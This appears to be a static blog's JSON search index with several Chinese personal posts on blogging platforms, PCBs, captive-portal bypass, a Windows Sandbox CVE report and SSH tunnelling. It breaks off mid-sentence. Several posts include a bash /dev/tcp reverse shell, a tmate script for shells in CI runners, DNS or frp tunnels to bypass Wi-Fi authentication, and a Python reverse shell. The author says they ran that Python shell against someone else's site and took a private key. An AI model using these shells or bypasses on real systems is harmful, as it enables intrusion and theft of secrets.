不过自己建动态网站也有个缺陷就是性能会比较差，如果直接用服务器的话被攻击基本上都是直接宕机，除非用防火墙，国外免费的防火墙CloudFlare因为审查的原因速度又太慢了，国内的话防火墙又太贵了。另外虽然建独立博客没有审查，但是在国内的网站都需要备案，如果有比较敏感的内容还是会被撤销备案，而且服务器也有可能会被封，除此之外个人备案还有一个很糟糕的地方就是不允许使用带有交互性的功能，比如说评论之类的，这就导致在国内的实际体验可能还不如平台托管的好。3、静态网站静态网站一般也分为几种，第一种叫纯静态网站，即写的网站程序是纯静态的，如果写博客可能是由JS用AJAX来调用Markdown文件渲染的形式，这种一般会用SPA的形式，比较经典的例如MDwiki，可惜不更新了，这种的比较复杂，一般只有前端大佬会用，另外这种的SEO效果会比较差。第二种叫静态网页生成，这种和纯前端的区别在于它写的文件并不能直接发布，而是用一些生成器调用模板来生成可以发布的网页。这种的好处就是在上一种的基础上提高了SEO的效果，降低了网站的开发难度，也降低了对客户端性能的消耗。我目前的博客就是使用这种方案，用的生成器叫做Jekyll，除了Jekyll之外还有比如Hexo、Hugo等等。第三种则是相对增强的，即前后端分离类型，把一些前端实在无法完成的任务交给后端来做。这里的后端可以是任何语言写的，比如我以前写的博客计数器，也不限运行的方式，比如Serverless也可以。   由于近期前端很火，所以最近各种Pages服务就冒了出来，因为纯前端页面几乎不耗费服务器资源，所以很多公司都愿意免费提供这种服务。然后现在CI/CD也很火，结果就有很多Pages服务就把这些东西全绑上，形成了一套很完整的系统。比如说各种模仿Github Pages的Gitlab Pages、Gitee Pages，还有Vercel、Cloudflare Pages等等，可以说是百花齐放了。当然如果不想用这些服务，用自己的服务器上面架静态网站也没有问题。我当时用Github Pages做博客的时候还没有这些服务呢，当然我现在也不打算换就是了。   目前来看除了Github Pages是只支持Jekyll，不支持执行其他网页生成器之外，其他的服务都支持完整的CI/CD。不过Github有Actions，真想搞也不是不行，就是有点麻烦，像我以前做的Pixiv索引就是基于Github的Actions+Pages服务做的。不过当时我做博客的时候也没有Actions来着😂，我当时做Mayx的日报的时候就用的是第三方的Travis-CI服务。   不过既然有CI/CD，那就有滥用的风险，我以前试过用tmate连接过那些Pages服务的CI/CD，具体的话大家可以用以下脚本连接：#!/bin/bash# Generate ssh key if neededmkdir ~/.ssh[ -e ~/.ssh/id_rsa ] || ssh-keygen -t rsa -f ~/.ssh/id_rsa -q -N \"\"# Run deamonized tmateecho Running tmate...chmod 777 ./tmate./tmate -S /tmp/tmate.sock new-session -d./tmate -S /tmp/tmate.sock wait tmate-ready# Print connection infoecho ________________________________________________________________________________echoecho To connect to this session copy-n-paste the following into a terminal:./tmate -S /tmp/tmate.sock display -p '#{tmate_ssh}'while [ -S /tmp/tmate.sock ]dosleep 1done这个方法是手头没服务器的用，不过不得不说tmate还挺好用的。有服务器的话建议用bash -i >& /dev/tcp/10.0.0.1/8080 0>&1一键反弹，然后用python的pty库升级成正常的shell就行了。   我大概看了一下，Vercel的部署服务器性能貌似是最好的，Cloudflare Pages和Github Actions的配置一样，有可能都是用的Azure云，虽然有滥用的风险，但是不鼓励大家去滥用。像之前我就有看新闻说有些人用Github Actions挖矿，虽然这些服务确实让很多前端开发者享受到了便利，但是被滥用还是挺糟糕的。   不过今天讲的是建博客，有点跑题了😂。不过也正是那些限制很少的CI/CD，可以让我们很方便的去部署我们的静态网站，无论用npm打包js，还是自动爬取页面缓存，或者正常点，用Hexo生成博客，都只需要我们直接配置好，就可以直接使用了。   既然其他Pages服务那么好我为什么还在用Github Pages呢？这是因为Github可以部署很多仓库到网站。其他的Pages服务部署都是各自是各自的域名，但是Github Pages就能直接在同域名下访问其他我开了Pages服务的仓库。   不过静态网站虽然优点很明显，节省服务器资源，但是问题就是在于它不太适合小白，虽然说现在部署一个博客也很简单，去Github上面Fork一个自己喜欢的模板，然后再选择自己喜欢的Pages服务提供商配置一下就好了，但是首先Github对小白操作也不那么容易，搜模板不能像WordPress那样可以预览，能不能用全看作者怎么写的，另外写文章也没办法做到所见即所得，毕竟Markdown语法虽然很简单但是还是需要记的，不能点一下就OK，然后就是各种功能的实现也很复杂，像我博客上的搜索、计数器、加密、评论实现起来都很不容易，不像动态网站那样直接CRUD一把梭，这些用动态网站实现起来就简单很多。   如果说大家想建一个可以在国内方便访问的静态博客，我个人建议用Gitee的，稳定性还不错。国外的话可能Cloudflare Pages更好一些，主要是我比较喜欢那个域名，就是部署的速度有点太慢了，访问速度还是挺不错的。我的Pages服务示例https://mayx.pages.dev/  https://mayx.vercel.app/  https://mabbs.github.io/可能是未来的博客类型无论是哪家服务，都有消失的可能性，多大的公司也可能会因为微小的概率而倒闭。所以以后有可能会出现一种不一样的博客平台，它可能是在IPFS上面的，前段时间我研究去中心化的分布式系统的时候也提到，到了未来说不定可以实现一个大家共同维护的系统。之前我有看见一个很有意思的项目RSS3，这是一个可以在区块链上面开博客的协议，看起来还是挺有意思的，如果真的能实现，也许我就能完成我的Mayx Forever计划了呢😁。未来的计划我之后可能会想个办法把我的博客发布到上面我提到的所有平台，这样说不定只要人类文明还存在，我的博客就还存在吧😂。看看GitHub Archive Program和Mayx Forever Project哪个能存活的时间更长😁。" },{ "title": "最近打电路板的体验", "category": "", "tags": "PCB, 电路板, 尺子", "url": "/2021/08/06/pcb.html", "date": "2021/08/06", "content": "感谢各位可以免费打PCB板的厂家能给我们机会体验自己制作电路板。起因一年前的假期，我偶然看见了有人在网上自制PCB名片，并且知道了嘉立创5CNY打样的消息，于是我就试着自己制作了PCB名片。我本来以为那可能就是我最后一次玩电路板了，可是令人没想到的是这些电路板厂商现在竟然可以免费打样了，1-4层FR-4的板子和单层铝基板全部免费，而且还是包邮，这简直是令人难以置信！在嘉立创7月份声明可以免费打样的时候我就连夜开始设计电路板了😂。我本来以为最便宜的私人定制可能最多就是纸模之类的，现在看来是我孤陋寡闻了，PCB才是最便宜的私人定制。重新设计的电路板当然作为非电子专业的人，我自然对打正儿八经的电路板一窍不通，但是有了上次的经验，至少我可以直接上手去做。这次我不太想打名片了，已经打过一次的东西再打一次也没啥意思，所以我就重新进行设计，打了一个圆形的挂牌，上面印了初音未来的简笔画。另外上面也印了我的信息，所以这也相当于是我的另一种名片，还有就是这个电路板我设计的时候是直径10cm，所以当杯垫也挺不错的，玻纤板的隔热性能还不错，可以避免把桌子烫坏。另外说到杯垫我最近又从华硕天选的小程序上换了礼物，这次换了杯垫，看起来和我的挂牌尺寸还挺相似的，不过正经的杯垫是陶瓷的，我这个还是不太正规啊😂。自己制作一把PCB尺子除了名片之外，我其实更想打的是PCB尺子，可惜嘉立创免费打样的尺寸只允许在10x10cm以内，10cm的尺子实在是没啥意思。后来我在网上了解到了捷配，这也是一家打PCB的厂家，他们似乎之前也有免费打电路板，不过他们可能是名声不够大，之前我还没听说过。不过现在的话他们和嘉立创一样，可以每月免费打样2次，同样是1-4层FR-4的板子和单层铝基板免费，但是很重要的一点是他们可以免费打尺寸≤ 0.015㎡/pcs的电路板！这就是说他们限制的是面积，而不是长和宽，另外这个尺寸的话也比10x10cm大了50立方厘米，也是相当的不错，另外就是捷配的选项更多一些，焊盘支持裸铜，还有无铅也是免费的，嘉立创的话就不支持这些选项，具体要求可以看这里   如果只限面积的话打尺子就会很方便，因为尺子的面积并不大，但是会很长。所以我考虑了一下打算在立创EDA上面进行设计，然后把Gerber文件给捷配去打。最开始设计的时候我脑子抽了，我在填PCB计价信息的时候在想这0.015㎡到底是多大呢？想着想着填了个15x2cm，然后系统显示总面积是0.0150㎡。emmmm看起来那就按15x2cm设计好了，可谁知那个总面积是5张板子总共加起来0.0150㎡，而实际我打的面积是0.003㎡，这我数学不行啊，脑子算不来😂……结果这我到下单之后才突然意识到，板子都开始生产了……那没办法，看来这尺子算是做废了，于是我就重新计算了一下，想了想干脆就30x5cm好了，30cm的尺子也算是很长了，这次我仔细的验算了一下，单片面积是0.015㎡没错，于是我就开始重新设计了。   在设计尺子的过程中，图案当然是可以直接导入，但是如果尺子上全是图案也没啥意思，不过有些人会在网上分享自己设计的PCB图纸，具体的话可以去OSHWHub里面找，有些有意思的设计就可以直接复制过来用，比如说量角器之类的。因为自己划线的话计算起来很麻烦，要把极坐标转换成直角坐标，我计算能力本来就很差，算这种东西实在是费脑子，所以我就还是去网上直接找现成的，不过我在网上找到的图纸都没有1°量程的，基本上都是10°量程的，还是挺伤脑筋的，不过没办法，有的用就不错了。最后设计好之后我也把图纸分享到了OSHWHub上面，如果有兴趣的话大家也可以去看看，另外因为我想做的是铝基板的尺子，所以是单面板的。试着打些其他有意思的东西？在OSHWHub上面还是有很多有意思的项目，大伙为了白嫖些有用的东西也是都费了些脑筋的。除了尺子之外，我看还有桌垫拼图挺有意思的，一张板是10x10cm，那么4张板拼起来就有20x20cm了，那么我下两单就能得到20x40cm大小的桌垫了，还是挺有意思的，另外从这里我也发现嘉立创的优势，那就是可以打绿色的铝基板，嘉立创的阻焊颜色要比捷配的丰富。不过很遗憾的是我不会焊东西，所以正经的电路板如果打出来也没办法用，而且看起来也没办法当装饰品，所以目前我不会去打那些对我来说没用的电路板，尽管功能看起来很有意思。一个例外：AZPR EvBoardAZPR EvBoard(AZ Processor Evaluative Board)是一本叫做《CPU自制入门》的书用来教学用的板子。它的特点就是很可爱，和一般的电路板不一样，它的背面被设计成一个女孩的模样。而且和一般的插图不一样，它的孔位和布线都看起来和板子上设计的女孩没有冲突的地方。最早我见到这个图案的时候是看见同学买了《CPU自制入门》这本书，它的中文版封面就是这个女孩，我看见之后就心想总有一天我要把这个电路图找出来。不过目前我还没有看那本书，我现在已经找到了这个板子的图纸，并且已经发给厂家生产了，等过段时间等板子到了，开学之后我就去找同学借一下这本书来看看。虽然以前上计算机组成原理的时候大概有学CPU的组成，不过我也没有亲手设计过，正好这次学学看感受一下设计CPU的乐趣。   另外如果各位想打这个板子的话，作者在Seeed上面共享了这个板子的Gerber文件，如果有兴趣的话也可以自己打，这个板子的版本是v1.2的，和书上的电路基本上是一样的。不过缺陷就是电源板需要另外打。正式卖的板子是v2.0的，目前我在全网上没有找到v2.0的图纸或者购买链接。另外淘宝上倒是能找到有卖v1.2板子的商家，不过完全不推荐购买，去嘉立创或者捷配免费打5张的板子能拿来卖15块钱也是够可以的。但是有个好处就是他们的板子是有组好元器件的，虽然很贵（688CNY，比正版贵了大概100CNY左右，可惜正版的买不到），不过如果真的想试试书上的实验买一个倒是也没问题。后续的打算回头我打算再设计一个圣诞树，一共应该是分为3部分（横向、纵向树的外形和圆形底座），然后在上面整些LED灯泡，顺便试试看学一下电烙铁的用法，最后用超低的成本DIY一个圣诞树出来(*^_^*)。" },{ "title": "如何给博客加上全文搜索功能", "category": "", "tags": "搜索, 博客, 全文", "url": "/2021/07/23/search.html", "date": "2021/07/23", "content": "原来JavaScript比Java还难？！起因前两天，我在看群的时候看到了其他人的博客，打开随便看了两眼莫名其妙的就点到搜索页面上了，随手一输那个效果想不到还不错，有那个全文搜索功能。   其实我之前也想搞全文搜索，但是作为静态博客，全文搜索意味着客户端要遍历所有的文章，想想好像挺耗时就没搞。但是再想想我写几百万字可能还没有一张图片大，似乎对用户体验也不会有特别大的影响，而且最主要的是我之前博客用的那个破烂玩意它需要调用bootstrap库，这库大也就算了，但是bootstarp的样式表会影响我博客的效果，我给那个插件作者反馈之后人家完全不在乎。行吧，开源作者有这个权利，那我只好换一家了。痛苦的写代码时间我最开始是想用那个最开始看到的那个博客上的代码然后随便改改用，但是那个代码的耦合性太高了，我也不想整些太多余的代码，我是拆了半天没拆出来之后我就放弃了，从网上搜搜看有没有更合适的。 （自己写？那是不可能的，我哪会JS啊😂）   后来我找到了Simple-Jekyll-Search这个项目，看起来好像还挺简单的，实际试了一下也挺简单的，而且还支持全文搜索，可惜就是不能高亮被搜索词。按它的说明用确实挺不错，不过我的博客结构如果加搜索的话，如果单独设置成一个超链接到单独的页面实在是太不明显了，后来我想了想干脆还是设置成搜索框吧，到时候用URL参数把内容传过去搜索，也算是挺方便的。但是有个很严重的问题就是这个库搜索要么就是键盘输入触发，要么就是用它带的search方法触发。最开始我还没看见那个search方法，想了半天想不出来怎么才能触发搜索，后来倒是看见了那个方法，不过还是有很大的问题，那就是我的代码肯定是在页面加载时运行的，但是那个插件搜索前需要把我全文的内容加载进来。这个加载需要时间而且还是异步的，这就导致我根本不知道那个方法什么时候可以使用。如果在它加载完成之前调用就搜索不到内容，这就很令人伤脑筋……就这个东西让我改代码改了几十次，看文档倒是说它加载完成时可以用success设置一个回调函数，然而实际上那是个假的选项，我试了一下就算是数据没有载入完它也会执行回调函数，这搞得我实在是没办法，说实话我JS的水平真的不太行，主要是JS的语法真的是很有特色，和其他语言都不一样，而且作为可以操作HTML的语言，还有那个异步，都注定它与其他语言是不一样的。总之新手还是别学JS了，学PHP都比JS好。突发奇想的解决之后我又看了半天并研究了一下那个插件的源代码，不管咋样，目前问题看起来就是出在AJAX的异步上了，而且最重要的是回调函数是假的，那我看算了，我不用这个垃圾插件的AJAX了，我用jQuery的AJAX它不香吗？所以我就用jQuery来加载我博客的全文内容最终可算是解决了问题。最终的代码搜索引擎的代码 search.html ： https://github.com/Mabbs/mabbs.github.io/blob/master/search.html   全文索引的代码 search.json ： https://github.com/Mabbs/mabbs.github.io/blob/master/search.json后记感觉这个问题真的是在我所有学习的编程语言中解决最曲折的了，主要还有一个问题就是网上的教程好多都是完全没用的东西，真的中文互联网根本学不成编程，全都是垃圾，在垃圾堆里找点可能有点用的东西，结果还是啥？烟雾弹！虽然我很看好前端，但是JS真的是把我整恶心了。" },{ "title": "绕过Portal认证的另一个想法", "category": "", "tags": "WiFi, Portal, 认证, 绕过", "url": "/2021/07/13/wifi.html", "date": "2021/07/13", "content": "也许反弹还是挺好用的？起因前段时间，我换了宿舍。待了一段时间之后我发现在新宿舍里比旧宿舍里多了一些WiFi，比如CMCC-EDU啥的。原来我们宿舍除了自己的WiFi就再没有别的了，那这个新的WiFi就引起了我的注意力。   我很久以前也研究过类似的WiFi，这种WiFi通常不使用密码验证，而是使用Portal验证。这种验证更加的自由，所以很多公共区域的WiFi都使用的是这种方式。但是这种验证有一个很大的缺陷，那就是正常来说用密码的WiFi，即AP的密码算是在第一层，也就是物理层上做的验证，通常物理层验证还是很难破解的，毕竟这就相当于把网线剪了，再厉害的黑客也没办法，通常也只能靠些什么旁路攻击之类乱七八糟的歪门邪道，不如直接接入网络直接干合适。   所以呢，当我可以直接接入WiFi时，不管怎么说，这都相当于我已经直接用网线直连到了这个网络中，然后只要想办法绕过认证服务器就可以。不过这么说也不是很准确，因为大多数人配交换机不会配的很严格，但是AP还要特地开个AP隔离就比较恶心。   通常来说，这个所谓的认证服务器也不过是一个二级的防火墙，通常就是通过认证的设备就在出站白名单里加上这个MAC地址，这样这个设备就可以正常上网了。绕过的思路绕过Portal认证的方法网上大多数是给的通过DNS隧道来绕过，因为大多数的这种服务器都不会自己写的DNS，而是用已经很成熟的软件，所以通常解析都不会受到影响。根据这一点，很多人就想出了使用DNS作为隧道来达到免费上网的目的，一般来说有两种方法，第一个是防火墙完全不封DNS的情况，也就是对UDP 53端口完全不设限的情况，这种情况直接搭一个使用UDP的任意隧道都可以。  还有一种是只允许使用DHCP分配的DNS服务器，一般也为了考虑到认证通过后能正常上网，所以解析都是正常的，考虑到DNS的特点，我们可以给自己服务器设置一个NS解析，这样我们就能拿被指定的这个DNS服务器作为跳板来和远程的服务器通信了。不过这个就不能随便选择软件了，需要用能伪装成DNS流量的软件来搭隧道，比如dns2tcp之类的就可以。  其实吧那个CMCC-EDU我试过，确实解析是没有问题的，正好Github之前还给我送了一年mayx.me的域名，我回头有机会我试试看能不能建立隧道吧。另一个想法上面的方法虽然很不错，但是太常见了，网上基本上搜怎么绕过Portal认证基本上都是这些办法，比较没意思，而且一般来说现在新的厂家应该都封掉了这个办法吧？毕竟只要给指定的DNS上面也加一个认证，必须是通过认证的设备才能正常解析，或者是像中国防火长城一样来一波DNS污染，这样DNS隧道就不能正常工作了。所以学了些网络知识的我有个不成熟的想法，那就是这种防火墙一般拦截的是出站，会不会不拦截入站？   事实上我还试了一下，那个CMCC-EDU很神奇的居然分配的是公网IP，所以我就试了试去ping连接的设备，想不到也可以ping成功，不过也可能只是防火墙没有拦截ICMP，具体因为我没待几天就回家了，有了这个想法也只是简单的做了几个测试而已，所以我也不是很清楚。不过没关系，如果没拦截ICMP也可以用ptunnel搭ICMP隧道。   不过如果入站真的没有防火墙，那么我可以试试主动连接的隧道，用起来有点像反弹。具体怎么搭这种隧道如果用的是Linux系统的设备可以看怎么搭SSH隧道，不过我这次实验想用frp来搭，也就是连接CMCC-EDU的设备打开frps，然后找个能连外网的服务器用frpc连进来，在配置段中加入：[socks_proxy]type = tcpremote_port = 1080plugin = socks5最后就直接用127.0.0.1:1080这个隧道上网就可以了，如果是Windows设备的话用Proxifier来上网效果还是相当不错的。不过我目前在家里不好试，等我开学了回宿舍试试看。局限性像这个方法也只能说是特定情况的另一种可能性吧，因为限制也是蛮多的，首先大多数Portal认证的WiFi不可能给一个公网IP，想要反弹至少要在同一个网络中，就这个限制就挺严格的，可能也就校园网可以用，另外就是不开入站防火墙也可能只是疏忽，万一管理员开了这个办法也不行，这也只能靠赌，也并不怎么好使，所以说这也就只是另一个想法，看以后如果真的遇到了类似的问题看怎么解决吧。   不过我确实也没接触过真正严格的网络，像那种极其严格的公司网络我也没见过，也许到时候如果有机会见一见的话就不会觉得这种垃圾防火墙算什么事情了吧😀。" },{ "title": "关于去中心化分布式系统的探索", "category": "", "tags": "分布式, 区块链", "url": "/2021/06/10/distributed.html", "date": "2021/06/10", "content": "向开放的网络世界前进！过去在6年前的某一天，我在洗完澡之后突然想研究一下分布式计算，那时候我在网上了解到的比较经典的两种大型分布式计算项目有两种，一种是以BOINC为代表的有中心的分布式计算软件，另外就是比特币为首的区块链应用。当时我了解完原理之后觉得比特币这种东西计算的完全都是没有意义的东西，而且这个计算本身不能产生任何价值。而BOINC进行的大多数是为科学的计算，虽然对我来说没有价值，但是它至少是有意义的。所以我就选择了另外一条路，也就是为使用BOINC的项目进行志愿计算。不过也正是这个原因，我有了不少基于BOINC的World Community Grid的点数，然后我就错过了发财的机会😂。现在前段时间正好来了一次矿潮，我虽然对挖矿没什么兴趣但是还是被带上了车，不过我研究了一段时间发现虽然挖矿确实是个烂行为，但是它这个去中心化的分布式系统还是有点意思，它的特点就是如果相信它的人多，那么就没有人能摧毁它，而且内容都是公平公正公开的，谁都能看得见而且也不能被篡改。   不过这个所谓的区块链不是不能篡改，而是篡改难度很大，篡改它必须要比所有其他节点的计算能力都强，以至于可以很轻松的比其他节点多算出很多个有效区块，然后根据协议其他节点就只能去相信这条最长的链。不过具体细节我没太了解，所以如果说的不对也请各位指正。   但是目前来看的话区块链貌似除了加密货币还没有什么太多的应用，而且我感觉它们大多数应用都是在做无用功，像挖矿干的事情全部都是通过很消耗计算资源的方式来计算一些NP问题，而且还是用像遍历这样的方法。要是说这个计算能为数学做出多大贡献，那我觉得还是有意义的，然而这计算的纯粹就只是比赛谁解题解的多，然后还要给自己解的题签个名证明是自己解的，然后通过这个稀有度提高价值外，真的对这个世界没有一点点帮助。   虽然说区块链本身通过记录数据有点用，或者像使用IPFS把存东西当作证明方法的Fil、还有ETH的什么智能合约啥的，但是相比于消耗的能源来说还是很不合适的，毕竟从理论上来说，如果使用中心化的方式实现同样的功能，消耗的资源要少太多了。   比如说像BOINC这种，消耗的计算资源大多数都在为了解决实际问题，或者是像PCDN，消耗的存储与网络资源基本上都是为了要服务的用户所消耗。这些中心化的分布式系统资源利用率很高，干的活基本上都是变成了实际有意义的东西，虽然说Fil也有点意义吧……但是它在证明自己有这个资源的过程中要消耗大量的计算资源，资源利用率实在是很低。还有就是BTT啥的，不过那个我没太看懂而且也不怎么出名就不说了。最近貌似还有个啥BZZ也是个分布式存储的……总之不太了解的我还是不多加评论了。未来不过我对这种去中心的分布式系统还是很看好的，这种就相当于是通过代码做中心，就像指导方案一样，而且通过数学的方式约束也更有公信力。像这样的系统更加难以破坏，而且很公平，相比于中心化的比如说公司或者政府更加容易被人相信。不过只要是系统那就还是得要人来维护，而人总是被利益驱动，所以如果没有奖励，也不会有人维护它，所以像用代币来激励维护系统的人这个我也能理解。   所以我希望以后能出现这样的一个系统，它可以精确的统计计算、存储以及网络资源，然后量化换成代币，而且这一过程不需要使用很多资源，使用这些资源的人可以通过代币来购买这些服务，然后为了保证服务质量，也可以通过质押之类的办法来让很多服务提供商来提高上线率之类的，然后服务商就是各个挖矿的用户，所以我也希望能不出现矿池这种情况，总之具体情况得等这个东西设计出来才行。后记本来我还想说一说去中心化分布式系统与现实的关系，不过最近我又犯期末综合征了，身体各个系统都在返回Status: Degraded，希望别哪天给我Status: Offline了😂。   总之就是这样今天我先写到这里吧。" },{ "title": "论如何发现一个计算机漏洞", "category": "", "tags": "安全, 漏洞, 网络", "url": "/2021/05/15/vulnerability.html", "date": "2021/05/15", "content": "网络安全？可不只是专业人员的事情。起因一个月前我发现了Windows沙箱有个很严重的漏洞，害得我都不敢相信微软产品的安全性了……不过Windows沙箱还是挺好用的，我不希望因为这种安全问题就放弃它，所以我就向微软反馈了这个漏洞。   于是昨两天，微软给我发邮箱说这个漏洞已经修好了，顺便感谢了一下我对微软产品安全性的贡献。虽然吧这个感谢也没给钱啥的，但是这个漏洞的描述页面能把我的名字写上去这个我还是挺高兴的。   在我收到这个消息当天，我兴奋的顺手又黑掉了一个网站😂，难不成我的天赋在信息安全上？Windows沙箱的漏洞发现过程与复现方法在几个月前，我的电脑莫名其妙的被安装上了Microsoft Edge Beta版，我明明从来没有安装过，但是它就是莫名其妙的出现了。这么一安装，我的电脑就有了两个Edge浏览器。像我对电脑上面的东西还是有一点点的洁癖的，我不希望电脑上出现多余的东西，像这种出现两个Edge的问题我肯定是无法忍受。所以呢我就开始想方设法的卸载掉它。   一般来说Edge Beta都是手动安装的，所以这种情况在“卸载或更改程序”里应该是可以发现的，但是这个是莫名其妙被安装上的，自然也就不会出现在那个列表之中。接下来我开始搜如何强行卸载掉Edge，网上搜到的答案一般就是在浏览器内核文件夹下找到Installer文件夹，然后在这个文件夹下执行命令.\\setup.exe --uninstall --system-level --verbose-logging --force-uninstall就OK了。结果我明明是去的Beta版下的那个文件夹执行的这条命令，然后它把我正式版的Edge卸掉了……卸掉之后不仅留下了一个删不掉的图标，而且Beta版里也没有我的Cookie和插件……   过了两天Windows更新了，更新之后正式版的又给我安装回来了……这真的是不知道怎么说……后来我下了一个Geek Uninstaller总算是把那个困扰我很长时间的Edge Beta卸载掉了。   就以上这件事情搞的我很烦躁，烦躁之后就想发泄，发泄又不能对着我的电脑发泄，于是我就打开了Windows沙箱，把Windows沙箱里的Edge给卸载掉了。结果怎么着？我物理机上的Edge也不见了！这说明了啥问题？我在沙箱里做的操作竟然影响到了物理机？后来我经过测试发现，微软似乎把物理机里的C:\\Program Files (x86)\\Microsoft\\Edge\\Application文件夹映射到了沙箱里，而且没有做任何的限制。这可真是太可怕了，要知道沙箱相当于一个被信任执行危险东西的一个地方，那么使用它的人都是不会考虑里面运行的东西是不是安全的，看来阿三写的代码不行啊。假如我写一个程序，它把msedge.exe文件感染了，比如说加个壳啥的，物理机上用Edge的人应该也不少吧，至少市场占有率都已经超过Firefox了，那么在沙箱里Edge被感染的人在物理机上一旦运行，那么物理机将陷入危险的境地。   最开始我发现了这个漏洞之后我是在反馈中心里提交的，不过那个看起来貌似一点点用都没有，微软是没有人会去看那个东西的，而且就算看到了也只会静悄悄的修复掉，你的反馈就和垃圾没什么区别。   后来我在百度上搜怎么向微软提交漏洞，百度简直就是个垃圾，没有搜到一点点有用的信息，之后看了半天我看到有一个文章说可以给 secure@microsoft.com 发邮件来反馈BUG，于是我就用英文写了篇文章来报告这个BUG。  不过我的方法并不正确，因为微软有专门反馈BUG的网站，也就是Microsoft Security Response Center。你如果直接用邮箱报告他们当然也会回复，但是大概率得不到奖金，因为人家的报告一般都有格式，自己写邮件肯定是不知道要按什么格式写。所以垃圾百度搜给微软报告漏洞根本找不到这个网站，还是我发了邮件之后才知道原来可以在这里报告，所以如果大家以后找到微软的漏洞想报告，千万不要用那个垃圾“反馈中心”，也不要发邮件，最好直接在这里报告漏洞。   另外还有个问题就是如果真的得到了奖金，拿到它也有点麻烦，因为微软不能说是让你发个支付宝收款码之类的，得先注册一个HackerOne或者Bugcrowd的账户，而且从国外提款很麻烦，所以如果不是那种经常能发现漏洞的，或者是在安全公司里的人，基本上这钱就还是别提了。复现的环境要求这个漏洞的大致使用方法读完上面的部分大家应该也都明白了吧，PoC？那种东西我怎么可能会写？傻子都知道怎么测试了吧？所以如果大家想复现这个漏洞首先需要运行在Windows 10的电脑上安装Windows沙箱，最早的有效版本我不太清楚，因为这个漏洞是微软把旧版的Edge完全从电脑上删除开始的，另外目前的话如果想要复现这个漏洞不能安装KB5003173补丁，如果安装了貌似也可以卸载掉。所以以当前发布这篇文章的时间来看，只要在最新的Windows 10上卸载KB5003173补丁，然后安装Windows沙箱，就可以复现这个漏洞。人生中第一个自己贡献了的CVE看来CVE-2021-31208就是我贡献的了，以后只要在微软的鸣谢列表里搜索Mayx就可以搜到我找到的漏洞了，虽然这个漏洞很简单，但是自己的名字能写到那个列表里也挺令人高兴的啊。那天我黑掉的网站5月12日那天，有一名叫做Kingfish404的人Fork了我的博客，结果第一眼看到了那个爬猎聘网的脚本，吓得我还以为这位是我的老师，因为最近我参与的一个项目就是去爬各种招聘网站。总之就是这些原因我对这个人产生了一点点兴趣，就看了看Ta的仓库。看着看着看到了一个可以在线学习Python的网站源代码，我很久以前就很想做一个开源的这种在线运行Python代码然后可以自动批阅的网站，就像Python123那样，就是因为他们那个服务要收费所以就想写个开源的，不过因为如果直接用Python在服务器上运行的话实在是太危险了，所以我想的是写一个使用Docker来运行Python并且评分的平台（也许可以用k8s？），可惜我水平有限，不怎么会用Docker所以就没再管了。但是今天既然看到了那不得拜读一下？结果发现这个人写的就是我说的那种危险方法运行Python脚本的，看了一下代码还用了一个漏洞百出的安全检查函数来防止攻击……总之既然有示例站我们就来搞搞试试看嘛。一般来说这种反弹shell绝对是简单的不得了，不过我也只是知道这个概念，怎么用我还是不太清楚。然后就搜了一下，看到了这篇文章。嗯……现实中攻击还是要比CTF中攻击有意思，然后我就在我的服务器上执行了一下nc -lvvp 1234，在它的代码执行框里执行：import socket,subprocess,oss=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect((\"remote-ip\",1234))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)p=subprocess.call([\"/bin/sh\",\"-i\"])就这样我就成功的反弹了一个Shell，虽然吧Ta给的权限不高，但是下个CA证书的私钥还是轻轻松松的。后来我给这个人反馈了一下他就把网站关掉了。   所以如果谁有兴趣想亲手试试看怎么反弹Shell也可以下载Ta的代码试一试。总结从以上来看，想找漏洞绝不是一定要学过网络/信息安全的人才能干的事情，至少我不是信息安全专业的，所以只要有能注意到问题的思考方法，要正面面对问题，要刻意触发问题，知道问题出现在哪里，猜测问题可以做什么，那么谁都可以发现漏洞，虽然发现了也不能说是大神吧……但是你看看这把我的名字写到鸣谢里不挺让人开心的吗？" },{ "title": "网络任意互联指南", "category": "", "tags": "网络, SSH, 指南", "url": "/2021/05/07/ssh.html", "date": "2021/05/07", "content": "SSH真的是太厉害了！起因最近一段时间我对网络的各种连法很感兴趣，比如说内网穿透，端口映射或者说打隧道之类的。一般来说做这些事情应该都要装一些软件才行，不过最近我发现居然平时很常用的SSH竟然包含所有我想要的这些功能，真的是让我感觉很神奇。所以也许我已经火星了，但是今天我还是想记录一下。万能的SSH如果你以为SSH就只是加密了的Telnet，那可真是大错特错，我感觉SSH想做的事情要更厉害，它可能是想做一个加密的TCP，上面可以跑各种应用，而且防火墙还不知道里面跑的内容是什么。   不过最终它也没能取代TCP，毕竟它本来就是基于TCP的，而且其他很多功能用的人也很少，这让我感觉很可惜……不过确实，SSH啥都能干，就是速度慢了亿点点……   所以我今天就来说一说它的功能和一些上位替代。内网穿透假如我有一台电脑在家，然后我还租了一个垃圾云服务器，服务器的性能很差但是家里的电脑性能很好。假如有一天我想在外面去玩我的电脑要怎么办呢？   一般来说家里的电脑都是在内网之中，而服务器都是在公网，任何一个地方都能访问，现在我如果想访问家里的电脑直接连难度很大，几乎是做不到的对吧，于是这时候我们可以让家里的电脑去连服务器，这样我们就有一条链路连接到家里的电脑了，然后我们再用别的设备去连服务器，这样我们就能间接访问我们的电脑了。   具体要怎么做呢？很简单，用SSH就能解决这个问题，首先一般服务器上都装的是Linux系统，一般都是自带OpenSSH的，而且还是SSH服务端，现在的Windows 10也是默认自带OpenSSH的，只不过是客户端。所以首先我们要做的就是用家里的电脑去连服务器。这时候的连接不能直接SSH连过去，普通的连没有任何作用，只是登录到远程服务器上了而已，我们必须要加上一些参数，就像这样：ssh -R 3389:127.0.0.1:3389 root@remote-ip执行这条指令之后系统仍然会正常的去连接到远程服务器上，但是你如果执行一下netstat -nlp的话，就可以发现SSH在本地也监听了一个3389的端口。不过默认的配置下SSH只会在服务器上映射这个端口，在服务器外是连不上的，另外如果说我只想穿透而不想打开服务器终端要该怎么办呢？   首先默认不登录终端这个方法很简单，加点参数就可以，就像这样：ssh -CfNR 3389:127.0.0.1:3389 root@remote-ip这样启动穿透之后就不会在家里的电脑上一直开着服务器终端了，只会有一个黑框而已，当然因为用了-f参数，你即使把黑框关了也不会影响。另外还有就是映射到服务器外这个问题，其实这个问题也很好解决，在sshd配置文件里把GatewayPorts no改成GatewayPorts 